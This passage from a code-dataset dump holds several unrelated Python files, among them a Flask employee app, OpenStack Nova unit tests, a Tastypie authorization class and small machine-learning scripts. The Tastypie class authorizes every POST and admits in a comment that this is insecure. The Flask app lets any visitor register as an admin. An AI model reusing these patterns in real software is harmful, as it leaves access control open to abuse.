output\r\n","sub_path":"week1/1/1-5_신예준_20210705.py","file_name":"1-5_신예준_20210705.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"391878783","text":"#!/usr/bin/env python\n\n_test_x = r'''\n/var/tmp/5g.img\n 1 boot\n 1 root\n 1 *swap\n - home\n'''[1:]\n\n_client_a_a = r'''\n/dev/sda\n 2 boot\n 8 overlay\n64 root\n 8 *swap\n 8 home\n32 src\n 8 local\n - opt\n'''[1:]\n\n_client_b_a = _client_a_a.replace('/dev/sda', '/dev/sdb')\n\n_client_a_a0 = r'''\n/dev/sda\n 2 boot\n64 *root\n 8 *swap\n 8 *home\n32 *src\n 8 *local\n - *opt\n'''[1:]\n\n_client_b_a0 = _client_a_a0.replace('/dev/sda', '/dev/sdb')\n\n_client_a_a1 = r'''\n/dev/sda\n 2 boot\n - -\n'''[1:]\n\n_client_b_a1 = _client_a_a1.replace('/dev/sda', '/dev/sdb')\n\n_client_h2 = r'''\n/dev/sda\n 4 boot\n32 root\n 8 *swap\n 8 home\n16 src\n 8 local\n - opt\n'''[1:]\n\n_server_e = r'''\n/dev/sdc\n 1 boot\n 4 root\n 4 *swap\n 4 home\n - srv\n'''[1:]\n","sub_path":"data/partdata.py","file_name":"partdata.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"534972107","text":"from flask import render_template, flash, redirect, url_for, request\nfrom flask_login import current_user, login_user, login_required, logout_user\nfrom werkzeug.urls import url_parse\nfrom app import db, app\nfrom app.forms import LoginForm, RegistrationForm, EmpForm, UpdateEmpForm\nfrom app.models import Admin, Employee\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n employees = Employee.query.all()\n return render_template('index.html', title='Home', employees=employees)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = LoginForm()\n if form.validate_on_submit():\n user = Admin.query.filter_by(email=form.email.data).first()\n if user is None or not user.check_password(form.password.data):\n flash('Invalid email or password', 'danger')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n next_page = request.args.get('next')\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('index')\n return redirect(next_page)\n return render_template('login.html', title='Sign In', form=form)\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = RegistrationForm()\n if form.validate_on_submit():\n admin = Admin(email=form.email.data)\n admin.set_password(form.password.data)\n db.session.add(admin)\n db.session.commit()\n flash('Congratulations, you are now an Admin', 'success')\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n\n@app.route('/add_emp', methods=['GET', 'POST'])\n@login_required\ndef add_emp():\n form = EmpForm()\n if form.validate_on_submit():\n employee = Employee(email=form.email.data,\n name=form.name.data,\n phone=form.phone.data,\n location=form.location.data,\n salary=form.salary.data)\n db.session.add(employee)\n db.session.commit()\n flash('Employee added', 'success')\n return redirect(url_for('index'))\n return render_template('add_emp.html', title='Add Employee', form=form)\n\n\n@app.route(\"/employee/<int:id>\")\ndef employee(id):\n employee = 
Employee.query.get_or_404(id)\n    return render_template('employee.html',\n                           title=employee.name,\n                           employee=employee)\n\n\n@app.route(\"/employee/<int:id>/update\", methods=['GET', 'POST'])\n@login_required\ndef update_emp(id):\n    employee = Employee.query.get_or_404(id)\n\n    form = UpdateEmpForm()\n\n    if form.validate_on_submit():\n\n        email = form.email.data\n        phone = form.phone.data\n        location = form.location.data\n        name = form.name.data\n        salary = form.salary.data\n\n        data_updated = False\n        data_valid = True\n\n        if email != employee.email:\n            if Employee.query.filter_by(email=email).first() is not None:\n                form.email.errors.append(\"Email already exists.\")\n                data_valid = False\n            else:\n                employee.email = email\n                data_updated = True\n\n        if phone != employee.phone:\n            if Employee.query.filter_by(phone=phone).first() is not None:\n                form.phone.errors.append(\"Phone No already exists.\")\n                data_valid = False\n            else:\n                employee.phone = phone\n                data_updated = True\n\n        if location != employee.location or salary != employee.salary \\\n                or employee.name != name:\n            data_updated = True\n\n        if data_updated and data_valid:\n            employee.location = location\n            employee.salary = salary\n            employee.name = name\n            db.session.commit()\n            flash('Employee details updated', 'success')\n            return redirect(url_for('employee', id=id))\n\n    elif request.method == 'GET':\n        form.name.data = employee.name\n        form.email.data = employee.email\n        form.phone.data = employee.phone\n        form.location.data = employee.location\n        form.salary.data = employee.salary\n    return render_template('add_emp.html', title='Update Post',\n                           form=form,)\n\n\n@app.route(\"/employee/<int:id>/delete\", methods=['GET', 'POST'])\n@login_required\ndef delete_emp(id):\n    employee = Employee.query.get_or_404(id)\n    db.session.delete(employee)\n    db.session.commit()\n    message = str(employee.name) + ' has been deleted!'\n    flash(message, 'success')\n    return redirect(url_for('index'))\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"257893681","text":"from puzzle import GameGrid\nfrom agent import *\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport numpy as np\nimport pickle\nimport random\n\ndef main():\n    existingAgent1 = None\n    with open(\"TrainingPartialCountRunner_100_20_4_5.pickle\", 'rb') as f:\n        existingAgent0 = pickle.load(f)\n\n    with open(\"ULRD_trained_model_20_game_layers_32_16.pickle\", 'rb') as f:\n        existingAgent1 = pickle.load(f)\n\n    with open(\"ULRD_trained_model_20_game_layers_64_16.pickle\", 'rb') as f:\n        existingAgent2 = pickle.load(f)\n\n    with open(\"ULRD_trained_model_20_game_layers_64_16_8.pickle\", 'rb') as f:\n        existingAgent3 = pickle.load(f)\n\n    with open(\"ULRD_trained_model_20_game_layers_64_32_8.pickle\", 'rb') as f:\n        existingAgent4 = pickle.load(f)\n\n    with open(\"ULRD_trained_model_20_game_layers_64.pickle\", 'rb') as f:\n        existingAgent5 = pickle.load(f)\n\n\n    agentDict = {1: RandomAgent(None, waitTime=0), 2: PatternAgentULRD(None, waitTime=0), 0: existingAgent0, 3: DNNAgent(None, waitTime=0, trainName=\"ULRD_train.pickle\"), 4 : existingAgent1, 5 : existingAgent2, 6 : existingAgent3, 7 : existingAgent4, 8 : existingAgent5}\n    agentDescription = {1: \"Random\", 2: \"Up-Left-Right-Down\", 0: \"Online learning NN\", 3: \"DNN Agent\", 4: \"DNN Agent with layers [32, 16]\", 5: \"DNN Agent with layers [64, 16]\", 6: \"DNN Agent with layers [64, 16, 8]\", 7: \"DNN Agent with layers [64, 32, 8]\", 8: \"DNN 
Agent with layers [64]\"}\n agentScoreDict = {1: [], 2: [], 0: [], 3: [], 4: [], 5: [], 6: [], 7: [], 8: []}\n agentColors = {1: \"b\", 2: \"r\", 0: \"#1f004d\", 3: \"g\", 4: \"c\", 5: \"m\", 6: \"y\",7: \"k\",8: \"#3CFE6E\"}\n\n gameIDs = []\n for i in range (0, 15):\n gameIDs.append(i)\n random.seed(i)\n for (agentKey, agent) in agentDict.items():\n gamegrid = GameGrid()\n gamegrid.hide()\n gamegrid.setAgent(agent)\n agent.setGameGrid(gamegrid)\n gamegrid.mainloop()\n agentScoreDict[agentKey].append(sumScoreMatrix(gamegrid.matrix))\n print(agentScoreDict[agentKey])\n agent.reset()\n\n plotTrainingRecord(gameIDs, agentDict, agentDescription, agentScoreDict, agentColors)\n\n\n\ndef sumScoreMatrix(mat):\n sum = 0\n for i in range(4):\n for j in range(4):\n sum += mat[i][j]\n return sum\n\ndef plotTrainingRecord(gameIDs, agentDict, agentSummarys, agentScoreDict, agentColors):\n ind = np.arange(len(gameIDs))\n fig, ax = plt.subplots()\n x = agentDict.keys()\n\n offset = 0\n for key in x:\n ax.bar(ind + offset, agentScoreDict[key], width=0.1,color=agentColors[key])\n offset += 0.11\n\n ax.legend(agentColors.values(), agentSummarys.values())\n\n ax.autoscale_view()\n\n custom_lines = [Line2D([0], [0], color=agentColors[1], lw=4),\n Line2D([0], [0], color=agentColors[2], lw=4),\n Line2D([0], [0], color=agentColors[0], lw=4),\n Line2D([0], [0], color=agentColors[3], lw=4),\n Line2D([0], [0], color=agentColors[4], lw=4),\n Line2D([0], [0], color=agentColors[5], lw=4),\n Line2D([0], [0], color=agentColors[6], lw=4),\n Line2D([0], [0], color=agentColors[7], lw=4),\n Line2D([0], [0], color=agentColors[8], lw=4)]\n\n fig, ax = plt.subplots()\n ax.legend(custom_lines, agentSummarys.values())\n\n plt.show()\n\nmain()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"433010999","text":"# Copyright 2014: Mirantis Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nimport mock\n\nfrom oslotest import mockpatch\n\nfrom cloudferrylib.os.compute import nova_compute\nfrom novaclient.v1_1 import client as nova_client\nfrom tests import test\n\n\nFAKE_CONFIG = {'user': 'fake_user',\n 'password': 'fake_password',\n 'tenant': 'fake_tenant',\n 'host': '1.1.1.1'}\n\n\nclass NovaComputeTestCase(test.TestCase):\n def setUp(self):\n super(NovaComputeTestCase, self).setUp()\n\n self.mock_client = mock.MagicMock()\n self.nc_patch = mockpatch.PatchObject(nova_client, 'Client',\n new=self.mock_client)\n self.useFixture(self.nc_patch)\n self.nova_client = nova_compute.NovaCompute(FAKE_CONFIG)\n\n self.fake_instance_0 = mock.Mock()\n self.fake_instance_1 = mock.Mock()\n self.fake_instance_0.id = 'fake_instance_id'\n\n self.fake_getter = mock.Mock()\n\n self.fake_flavor_0 = mock.Mock()\n self.fake_flavor_1 = mock.Mock()\n\n def test_get_nova_client(self):\n # To check self.mock_client call only from this test method\n self.mock_client.reset_mock()\n\n client = self.nova_client.get_nova_client(FAKE_CONFIG)\n\n self.mock_client.assert_called_once_with('fake_user', 'fake_password',\n 'fake_tenant',\n 'http://1.1.1.1:35357/v2.0/')\n self.assertEqual(self.mock_client(), client)\n\n def test_create_instance(self):\n self.mock_client().servers.create.return_value = self.fake_instance_0\n\n instance_id = self.nova_client.create_instance(name='fake_instance',\n image='fake_image',\n flavor='fake_flavor')\n\n self.assertEqual('fake_instance_id', instance_id)\n\n def test_get_instances_list(self):\n fake_instances_list = [self.fake_instance_0, self.fake_instance_1]\n self.mock_client().servers.list.return_value = fake_instances_list\n\n instances_list = self.nova_client.get_instances_list()\n\n test_args = {'marker': None,\n 'detailed': True,\n 'limit': None,\n 'search_opts': None}\n self.mock_client().servers.list.assert_called_once_with(**test_args)\n self.assertEqual(fake_instances_list, instances_list)\n\n def test_get_status(self):\n self.fake_getter.get('fake_id').status = 'start'\n\n status = self.nova_client.get_status(self.fake_getter, 'fake_id')\n\n self.assertEqual('start', status)\n\n def test_change_status_start(self):\n self.nova_client.change_status('start', instance=self.fake_instance_0)\n self.fake_instance_0.start.assert_called_once_with()\n\n def test_change_status_stop(self):\n self.nova_client.change_status('stop', instance=self.fake_instance_0)\n self.fake_instance_0.stop.assert_called_once_with()\n\n def test_change_status_resume(self):\n self.nova_client.change_status('resume', instance=self.fake_instance_0)\n self.fake_instance_0.resume.assert_called_once_with()\n\n def test_change_status_paused(self):\n self.nova_client.change_status('paused', instance=self.fake_instance_0)\n self.fake_instance_0.pause.assert_called_once_with()\n\n def test_change_status_unpaused(self):\n self.nova_client.change_status('unpaused',\n instance=self.fake_instance_0)\n self.fake_instance_0.unpause.assert_called_once_with()\n\n def test_change_status_suspend(self):\n self.nova_client.change_status('suspend',\n instance=self.fake_instance_0)\n self.fake_instance_0.suspend.assert_called_once_with()\n\n def test_change_status_same(self):\n self.mock_client().servers.get('fake_instance_id').status = 'stop'\n\n self.nova_client.change_status('stop', instance=self.fake_instance_0)\n self.assertFalse(self.fake_instance_0.stop.called)\n\n def 
test___get_disk_path_ephemeral(self):\n fake_instance_inf = {'id': 'fake_id'}\n fake_blk_list = [\n \"compute/%s%s\" % (fake_instance_inf['id'], '_fake_disk')]\n disk_path = self.nova_client._NovaCompute__get_disk_path(\n 'fake_disk',\n fake_blk_list,\n fake_instance_inf,\n is_ceph_ephemeral=True)\n\n self.assertEqual('compute/fake_id_fake_disk', disk_path)\n\n def test_get_flavor_from_id(self):\n self.mock_client().flavors.get.return_value = self.fake_flavor_0\n\n flavor = self.nova_client.get_flavor_from_id('fake_flavor_id')\n\n self.assertEqual(self.fake_flavor_0, flavor)\n\n def test_get_flavor_list(self):\n fake_flavor_list = [self.fake_flavor_0, self.fake_flavor_1]\n self.mock_client().flavors.list.return_value = fake_flavor_list\n\n flavor_list = self.nova_client.get_flavor_list()\n\n self.assertEqual(fake_flavor_list, flavor_list)\n\n def test_create_flavor(self):\n self.mock_client().flavors.create.return_value = self.fake_flavor_0\n\n flavor = self.nova_client.create_flavor()\n\n self.assertEqual(self.fake_flavor_0, flavor)\n\n def test_delete_flavor(self):\n self.nova_client.delete_flavor('fake_fl_id')\n\n self.mock_client().flavors.delete.assert_called_once_with('fake_fl_id')\n","sub_path":"tests/cloudferrylib/os/compute/test_nova.py","file_name":"test_nova.py","file_ext":"py","file_size_in_byte":6049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"198001693","text":"from tastypie.authorization import Authorization\nfrom tastypie.exceptions import Unauthorized\n\n\n# adapted from http://django-tastypie.readthedocs.org/en/latest/authorization.html\n#\n# Usage:\n# class ApiResource(ModelResource):\n# class Meta:\n# queryset = model_name.objects.all()\n# authorization = OwnerAuthorization('model_owner_attribute')\n#\n# TODO: This class is duplicated in mrvapi/v1.py and can be consolidated to one Django application\nclass OwnerAuthorization(Authorization):\n def __init__(self, filter):\n # This Authorization class receives a string in the constructor\n # This string identifies the object member that should be compared against bundle.request.user\n self.filter = filter\n self.filter_list = filter.split('__')\n self.filter_dict = {filter: None}\n\n def read_list(self, object_list, bundle):\n # This assumes a ``QuerySet`` from ``ModelResource``.\n self.filter_dict[self.filter] = bundle.request.user\n return object_list.filter(**self.filter_dict)\n\n def read_detail(self, object_list, bundle):\n # Is the requested object owned by the user?\n owner = bundle.obj\n for filter in self.filter_list: # works recursively, climbing up FK relations to get owner\n owner = getattr(owner, filter)\n\n # while this does return False for un-authorized users, and SHOULD work according to documentation -- it does NOT.\n # return owner == bundle.request.user # This False is ignored; anyone could see object(s)\n # This comment should remain until upstream issue can be filed/reviewed by tastypie project maintainer\n # We must rather raise an exception:\n if not owner == bundle.request.user:\n raise Unauthorized(\"You do not have access to this resource.\")\n return True\n\n def create_list(self, object_list, bundle):\n # Assuming they are already assigned to ``user``.\n return object_list\n\n def create_detail(self, object_list, bundle):\n # 1- get the related owner of the object from a filter like 'parcel__project__owner'\n # owner = bundle.obj\n # for filter in self.filter_list:\n # owner = getattr(owner, filter)\n # expected result:\n # owner => 
bundle.obj.parcel.project.owner\n        # actual result:\n        #   File \"C:\\python27\\lib\\site-packages\\django\\db\\models\\fields\\related.py\", line 387, in __get__\n        #     raise self.field.rel.to.DoesNotExist\n        # DoesNotExist\n        # 2- compare owner with user request\n        # return owner == bundle.request.user\n\n        # cannot get working, will have to authorize all POSTs in interim -- insecure\n        return True\n\n    def update_list(self, object_list, bundle):\n        allowed = []\n\n        # Since they may not all be saved, iterate over them.\n        for obj in object_list:\n            if getattr(obj, self.filter) == bundle.request.user:\n                allowed.append(obj)\n\n        return allowed\n\n    def update_detail(self, object_list, bundle):\n        # Is the requested object owned by the user?\n        owner = bundle.obj\n        for filter in self.filter_list:\n            owner = getattr(owner, filter)\n        if not owner == bundle.request.user:\n            raise Unauthorized(\"You do not have access to this resource.\")\n        return True\n\n    def delete_list(self, object_list, bundle):\n        allowed = []\n\n        for obj in object_list:\n            if getattr(obj, self.filter) == bundle.request.user:\n                allowed.append(obj)\n\n        return allowed\n\n    def delete_detail(self, object_list, bundle):\n        # Is the requested object owned by the user?\n        owner = bundle.obj\n        for filter in self.filter_list:\n            owner = getattr(owner, filter)\n        if not owner == bundle.request.user:\n            raise Unauthorized(\"You do not have access to this resource.\")\n        return True\n\n\n# adapted from http://django-tastypie.readthedocs.org/en/latest/authorization.html\nclass OwnerAuthorizationWithPublic(OwnerAuthorization):\n    def read_list(self, object_list, bundle):\n        # This assumes a ``QuerySet`` from ``ModelResource``.\n        self.filter_dict[self.filter] = bundle.request.user\n        owners_list = object_list.filter(**self.filter_dict)\n        public_list = object_list.filter(public=True)\n        return (owners_list | public_list)\n\n    def read_detail(self, object_list, bundle):\n        # Is the requested object owned by the user? 
or is it public?\n owner = bundle.obj\n for filter in self.filter_list: # works recursively, climbing up FK relations to get owner\n owner = getattr(owner, filter)\n if (not bundle.obj.public) and (owner != bundle.request.user):\n raise Unauthorized(\"You do not have access to this resource.\")\n return True\n","sub_path":"mrvapi/v1auth.py","file_name":"v1auth.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"654026306","text":"import turtle\nimport random\nimport math\n\n\nclass ConfettiDrawer(object):\n def __init__(self):\n self.Mark = turtle.Turtle()\n self.Mark.speed(0)\n self.screen = turtle.Screen()\n self.circle_list = []\n self.circle_number = 10000\n self.radius = 25\n self.counter = 0\n self.generate_circles()\n self.screen.exitonclick()\n\n def check_intersection(self, coordinates):\n intersection = True\n for circle in self.circle_list:\n if math.sqrt((coordinates[0]-circle[0])**2 + (coordinates[1]-circle[1])**2) >= 2*self.radius:\n pass\n else:\n intersection = False\n self.counter += 1\n return intersection\n\n def generate_circles(self):\n counter = 0\n while counter < self.circle_number:\n if self.counter > self.circle_number*100:\n break\n x = random.randint(self.radius-650, 650-self.radius)\n y = random.randint(self.radius-335, 335-self.radius)\n coordinates = [x, y]\n if self.check_intersection(coordinates):\n counter += 1\n self.circle_list.append(coordinates)\n self.Mark.penup()\n self.Mark.goto(x, y)\n self.Mark.pendown()\n self.Mark.dot(self.radius*2, \"#\" + \"%06x\" % random.randint(0, 0xFFFFFF))\n\n\n\napp = ConfettiDrawer()\n","sub_path":"SmallProjects/NonOverlapping.py","file_name":"NonOverlapping.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"125877254","text":"import unittest\nimport os\nimport csv\nimport json\nfrom argparse import Namespace\nimport odybcl2fastq.util as util\nimport odybcl2fastq.run as run\nimport odybcl2fastq.parsers.parse_sample_sheet as ss\n\nclass Odybcl2fastqTests(unittest.TestCase):\n\n def setUp(self):\n self.sample_data_dir = (os.path.abspath( os.path.dirname( __file__ ) ) +\n '/sample_data/')\n\n def tearDown(self):\n pass\n\n def test_sheet_parse(self):\n sample_sheet_path = 'tests/sample_data/SampleSheet.csv'\n sample_sheet = ss.sheet_parse(sample_sheet_path)\n parts = ['Header', 'Reads', 'Settings', 'Data']\n for part in parts:\n assert (part in sample_sheet and sample_sheet[part])\n\n def test_get_instrument(self):\n run_info = 'tests/sample_data/RunInfo.xml'\n sample_sheet_path = 'tests/sample_data/SampleSheet.json'\n sample_sheet = util.load_json(sample_sheet_path)\n instrument = ss.get_instrument(sample_sheet['Data'])\n assert instrument == 'hiseq'\n\n def test_extract_basemasks(self):\n run_info = 'tests/sample_data/RunInfo.xml'\n instrument = 'hiseq'\n # json does not give ordered results\n sample_sheet_path = 'tests/sample_data/SampleSheet.csv'\n sample_sheet = ss.sheet_parse(sample_sheet_path)\n mask_lists, mask_samples = run.extract_basemasks(sample_sheet['Data'], run_info, instrument)\n mask_lists_control = {'y26,i8,y134': ['1:y26,i8,y134', '2:y26,i8,y134']}\n assert (mask_lists == mask_lists_control)\n\n def test_build_cmd(self):\n mask_list = ['1:y26,i8,y134', '2:y26,i8,y134']\n instrument = 'hiseq'\n args = Namespace(BCL_ADAPTER_STRINGENCY=0.90000000000000002, BCL_BARCODE_MISMATCHES=0,\n 
BCL_CREATE_INDEXREAD_FASTQ=False, BCL_FASTQ_COMPRESSION_LEVEL=4,\n BCL_FIND_ADAPTERS_SLIDING_WINDOW=False, BCL_IGNORE_MISSING_BCLS=True,\n BCL_IGNORE_MISSING_FILTER=True, BCL_IGNORE_MISSING_POSITIONS=True,\n BCL_MASK_SHORT_ADAPTER_READS=22, BCL_MINIMUM_TRIMMED_READ_LENGTH=0,\n BCL_NO_BGZF=False, BCL_NO_LANE_SPLITTING=True,\n BCL_OUTPUT_DIR='/n/ngsdata/odybcl2fastq_test/test_run',\n BCL_PROC_THREADS=8,\n BCL_RUNFOLDER_DIR='/n/boslfs/INSTRUMENTS/illumina/test_run',\n BCL_SAMPLE_SHEET='/n/boslfs/INSTRUMENTS/illumina/test_run/SampleSheet_new.csv',\n BCL_TILES=False, BCL_WITH_FAILED_READS=False,\n BCL_WRITE_FASTQ_REVCOMP=False,\n RUNINFO_XML='/n/boslfs/INSTRUMENTS/illumina/test_run/RunInfo.xml',\n TEST=True\n )\n switches_to_names = {('--with-failed-reads',): 'BCL_WITH_FAILED_READS',\n ('--adapter-stringency',): 'BCL_ADAPTER_STRINGENCY', ('-p',\n '--processing-threads'): 'BCL_PROC_THREADS', ('-o',\n '--output-dir'): 'BCL_OUTPUT_DIR',\n ('--find-adapters-with-sliding-window',):\n 'BCL_FIND_ADAPTERS_SLIDING_WINDOW',\n ('--barcode-mismatches',): 'BCL_BARCODE_MISMATCHES',\n ('--ignore-missing-positions',):\n 'BCL_IGNORE_MISSING_POSITIONS', ('--no-bgzf-compression',):\n 'BCL_NO_BGZF', ('--sample-sheet',): 'BCL_SAMPLE_SHEET',\n ('--mask-short-adapter-reads',):\n 'BCL_MASK_SHORT_ADAPTER_READS',\n ('--minimum-trimmed-read-length',):\n 'BCL_MINIMUM_TRIMMED_READ_LENGTH',\n ('--ignore-missing-bcls',): 'BCL_IGNORE_MISSING_BCLS',\n ('-R', '--runfolder-dir'): 'BCL_RUNFOLDER_DIR',\n ('--create-fastq-for-index-reads',):\n 'BCL_CREATE_INDEXREAD_FASTQ',\n ('--write-fastq-reverse-complement',):\n 'BCL_WRITE_FASTQ_REVCOMP', ('--no-lane-splitting',):\n 'BCL_NO_LANE_SPLITTING', ('--tiles',): 'BCL_TILES',\n ('--ignore-missing-filter',): 'BCL_IGNORE_MISSING_FILTER',\n ('--fastq-compression-level',):\n 'BCL_FASTQ_COMPRESSION_LEVEL'\n }\n run_type = None\n cmd_path = 'tests/sample_data/cmd.json'\n cmd_control = util.load_json(cmd_path)\n cmd = run.bcl2fastq_build_cmd(args,\n switches_to_names, mask_list, instrument, run_type)\n assert cmd == cmd_control\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/odybcl2fastq_tests.py","file_name":"odybcl2fastq_tests.py","file_ext":"py","file_size_in_byte":4461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"252464653","text":"import tensorflow as tf\nimport numpy as np\nimport cv2\nimport sys\nsys.path.append('game/')\nimport wrapped_flappy_bird as fb\n\nACTIONS = 2\nIMAGE_SIZE = 80\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nsaver = tf.train.import_meta_graph('./flappy_bird_dqn-8500000.meta')\nsaver.restore(sess, tf.train.latest_checkpoint('./'))\ngraph = tf.get_default_graph()\n\nS = graph.get_tensor_by_name('State:0')\nQ = graph.get_tensor_by_name('Q-value:0')\n\ngame_state = fb.GameState()\n\ndo_nothing = np.zeros(ACTIONS)\ndo_nothing[0] = 1\nimg, reward, terminal = game_state.frame_step(do_nothing)\nimg = cv2.cvtColor(cv2.resize(img, (IMAGE_SIZE, IMAGE_SIZE)), cv2.COLOR_BGR2GRAY)\n_, img = cv2.threshold(img, 1, 255, cv2.THRESH_BINARY)\nS0 = np.stack((img, img, img, img), axis=2)\n\nwhile True:\n Qv = sess.run(Q, feed_dict={S: [S0]})[0]\n Av = np.zeros(ACTIONS)\n Av[np.argmax(Qv)] = 1\n\n img, reward, terminal = game_state.frame_step(Av)\n img = cv2.cvtColor(cv2.resize(img, (IMAGE_SIZE, IMAGE_SIZE)), cv2.COLOR_BGR2GRAY)\n _, img = cv2.threshold(img, 1, 255, cv2.THRESH_BINARY)\n img = np.reshape(img, (IMAGE_SIZE, IMAGE_SIZE, 1))\n S0 = np.append(S0[:, :, 1:], img, 
axis=2)","sub_path":"my_flappy_bird/FBDQN/game/test_bird.py","file_name":"test_bird.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"527496693","text":"def coal_ecdf(coal):\n import pandas as pd\n import pathlib\n import warnings\n from ecdf import ecdf\n\n warnings\n\n # Read in Coal Qual Data on the Samples.\n fileDir = pathlib.Path(__file__).parents[2]\n samples_filename = fileDir / 'Data' / 'COALQUAL Data' / 'Coal Qual Sample Data.csv'\n trace_element_filename = fileDir / 'Data' / 'COALQUAL Data' / 'Coal Qual Trace Element Data.csv'\n ultimate_analysis_filename = fileDir / 'Data' / 'COALQUAL Data' / 'Coal Qual Ultimate Analysis Data.csv'\n\n # Note that we use skipfooter to not read in the search criteria column.\n Samples = pd.read_csv(samples_filename, header=1,\n names=['Sample_ID', 'State', 'County', 'Region', 'Field', 'Formation', 'Bed', 'Rank'],\n usecols=[0, 1, 2, 6, 7, 9, 11, 27], engine='python', skipfooter=2)\n Trace_Element = pd.read_csv(trace_element_filename, header=1, names=['Sample_ID', 'Arsenic', 'Boron', 'Bromine',\n 'Chlorides', 'Mercury', 'Lead', 'Selenium'],\n usecols=[0, 23, 27, 35, 41, 67, 95, 115], engine='python', skipfooter=2)\n Ultimate_Analysis = pd.read_csv(ultimate_analysis_filename, header=1, names=['Sample_ID', 'Sulfur', 'Heat'],\n usecols=[0, 18, 21], engine='python', skipfooter=2)\n # Merge data together\n COALQUAL = pd.merge(Samples, Trace_Element, on='Sample_ID')\n COALQUAL = pd.merge(COALQUAL, Ultimate_Analysis, on='Sample_ID')\n\n qe_Cl_All, pe_Cl_All = ecdf(COALQUAL['Chlorides'])\n qe_Br_All, pe_Br_All = ecdf(COALQUAL['Bromine'])\n\n #For Appalachian Low Sulfur Coal\n if coal == 'Appalachian Low Sulfur':\n COALQUAL = COALQUAL[(COALQUAL['Region'] == 'SOUTHERN APPALACHIAN') | (COALQUAL['Region'] == 'CENTRAL APPALACHIAN')\n | (COALQUAL['Region'] == 'NORTHERN APPALACHIAN')]\n # USGS Circular 891 defines \"low sulfur coal\" as less than 1% total sulfur (https://pubs.usgs.gov/circ/c891/glossary.htm).\n # This is identical to the standard used by the EIA.\n COALQUAL = COALQUAL[COALQUAL['Sulfur'] < 1]\n Chlorides = [x for x in COALQUAL['Chlorides'] if x != '']\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br, pe_Br = ecdf(COALQUAL['Bromine'])\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8188 #Btu/kWh\n FGD_water_treatment = 2.14e-4 #m^3/kWh\n\n # For Appalachian Medium Sulfur Coal\n elif coal == 'Appalachian Med Sulfur':\n COALQUAL = COALQUAL[(COALQUAL['Region'] == 'SOUTHERN APPALACHIAN') | (COALQUAL['Region'] == 'CENTRAL APPALACHIAN') | (COALQUAL['Region'] == 'NORTHERN APPALACHIAN')]\n COALQUAL = COALQUAL[(COALQUAL['Sulfur'] > 1) & (COALQUAL['Sulfur'] < 3)]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n qe_Se, pe_Se = ecdf(COALQUAL['Selenium'])\n qe_B, pe_B = ecdf(COALQUAL['Boron'])\n qe_Br, pe_Br = ecdf(COALQUAL['Bromine'])\n qe_Pb, pe_Pb = ecdf(COALQUAL['Lead'])\n qe_As, pe_As = ecdf(COALQUAL['Arsenic'])\n qe_Hg, pe_Hg = ecdf(COALQUAL['Mercury'])\n qe_Heat, pe_Heat = ecdf(COALQUAL['Heat'])\n gross_heat_rate = 8210 #Btu/kWh\n FGD_water_treatment = 2.20e-4 #m^3/kWh\n\n # For Beulah-Zap Bed Coal\n elif coal == 'Beulah-Zap':\n COALQUAL = COALQUAL[(COALQUAL['Bed'] == 'BEULAH-ZAP')]\n qe_Cl, pe_Cl = ecdf(COALQUAL['Chlorides'])\n 
